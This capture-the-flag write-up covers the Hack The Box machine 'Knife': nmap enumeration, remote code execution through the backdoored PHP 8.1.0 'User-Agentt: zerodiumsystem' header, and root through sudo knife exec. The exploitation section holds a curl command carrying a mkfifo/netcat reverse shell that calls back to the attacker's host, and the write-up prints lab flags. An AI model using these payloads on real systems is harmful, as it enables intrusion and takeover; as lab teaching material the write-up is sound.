# Knife
## Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.242 -oN allPorts
* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.
```
# Nmap 7.92 scan initiated Wed Jan 5 19:11:34 2022 as: nmap -sS --min-rate 5000 -p- -T5 -Pn -n -oN allPorts 10.10.10.242
Warning: 10.10.10.242 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.242
Host is up (0.089s latency).
Not shown: 41065 filtered tcp ports (no-response), 24468 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
# Nmap done at Wed Jan 5 19:12:09 2022 -- 1 IP address (1 host up) scanned in 35.41 seconds
```
As we see, only ports 22 (SSH) and 80 (HTTP) are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
> nmap -sC -sV -p22,80 10.10.10.242 -oN targeted
* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.
```
# Nmap 7.92 scan initiated Wed Jan 5 19:12:34 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Emergent Medical Idea
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 5 19:12:44 2022 -- 1 IP address (1 host up) scanned in 10.32 seconds
```
It seems like we are facing a web page. Let's take a look at it.
There is not much going on there. None of the buttons work, and there is no valuable information in the source code. Let's see what the *Wappalyzer* detects.
{% hint style="info" %}
**Wappalyzer** is a browser extension capable of detecting the technology stack of any website. It reveals the technology stack of any website, such as CMS, ecommerce platform or payment processor, as well as company and contact details.
{% endhint %}
## Exploitation
Wappalyzer detected that the website is running *PHP 8.1.0*. Let's search for any common exploit on [exploit-db](https://www.exploit-db.com/).
{% hint style="info" %}
Exploit-DB is a great database of exploits and proof-of-concepts used by penetration testers and vulnerability researchers.
{% endhint %}
I found a [RCE exploit](https://www.exploit-db.com/exploits/49933), which basically add a new header to the *GET* requests in order to execute commands. It adds the `User-Agentt` header with the value `zerodiumsystem('command');`. Note that the new header is with double `t`.
To get a shell, first we have to set a netcat listener.
> nc -lvnp 4444
* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.
If we send a *GET* request with the malicious header, we'll get a shell as the user *james*, and we'll be able to grab the user flag.
> curl -H "User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 4444 >/tmp/f');"
* `-H` set the **headers** of the request.
```
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.242] 55832
/bin/sh: 0: can't access tty; job control turned off
$ whoami
james
$ cat /home/james/user.txt
d4768ad57a1052305110b44b5427a9c4
```
## Privilege Escalation
First of all, let's set an interactive TTY shell.
> script /dev/null -c /bin/bash
Then I press `Ctrl+Z` and execute the following command on my local machine:
> stty raw -echo; fg
Next, I export a few variables:
> export TERM=xterm
>
> export SHELL=bash
Finally, I run the following command in our local machine:
> stty size
```
51 236
```
And set the proper dimensions in the victim machine:
> stty rows 51 columns 236
Let's see if the *james* user can run any command as any other user.
> sudo -l
* `-l` list user **privileges**.
```
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
```
We can execute the *knife* command as the root user. Let's see if there is any way of getting a shell as the root user.
{% hint style="info" %}
GTFOBins is a great list of binaries that can be used to escalate privileges if you have the right permissions:
{% endhint %}
If you search for the *knife* command in *GTFOBins*, you'll find that executing the following command, will spawn a shell as root. Then, all we have to do is reap the harvest and take the root flag.
> sudo knife exec -E 'exec "/bin/bash"'
```
root@knife:/# whoami
root
root@knife:/# cat /root/root.txt
a307ca11ffc211bb41fdd074ddbdd5bc
```